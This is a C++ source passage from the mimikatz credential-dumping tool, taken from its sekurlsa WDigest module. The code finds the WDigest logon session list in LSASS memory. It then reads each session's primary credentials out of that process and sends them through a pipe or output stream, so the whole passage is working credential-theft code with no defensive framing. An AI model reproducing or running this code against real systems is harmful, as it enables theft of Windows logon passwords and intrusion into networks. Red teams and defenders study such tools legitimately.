__kextdll bool __cdecl getWDigestFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
{
wostringstream monStream;
monStream << L"** wdigest.dll/lsasrv.dll ** ; Research Status : " << (searchWDigestEntryList() ? L"OK :)" : L"KO :(") << endl << endl <<
L"@l_LogSessList = " << l_LogSessList << endl <<
L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl;
return sendTo(monPipe, monStream.str());
}
bool WINAPI getWDigestLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity)
{
wostringstream maReponse;
if(searchWDigestEntryList())
{
PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
if(PKIWI_WDIGEST_LIST_ENTRY pLogSession = reinterpret_cast<PKIWI_WDIGEST_LIST_ENTRY>(getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId)))
{
mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(pLogSession) + offsetWDigestPrimary);
}
genericCredsToStream(&maReponse, mesCreds, justSecurity);
}
else maReponse << L"n.a. (wdigest KO)";
return sendTo(monPipe, maReponse.str());
}
bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity)
{
if(searchWDigestEntryList())
{
PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
DWORD taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL);
BYTE * monBuff = new BYTE[taille];
if(PLIST_ENTRY pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
if( mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS))
mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(monBuff) + offsetWDigestPrimary);
mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
delete [] monBuff;
}
else (*outputStream) << L"n.a. (wdigest KO)";
return true;
}
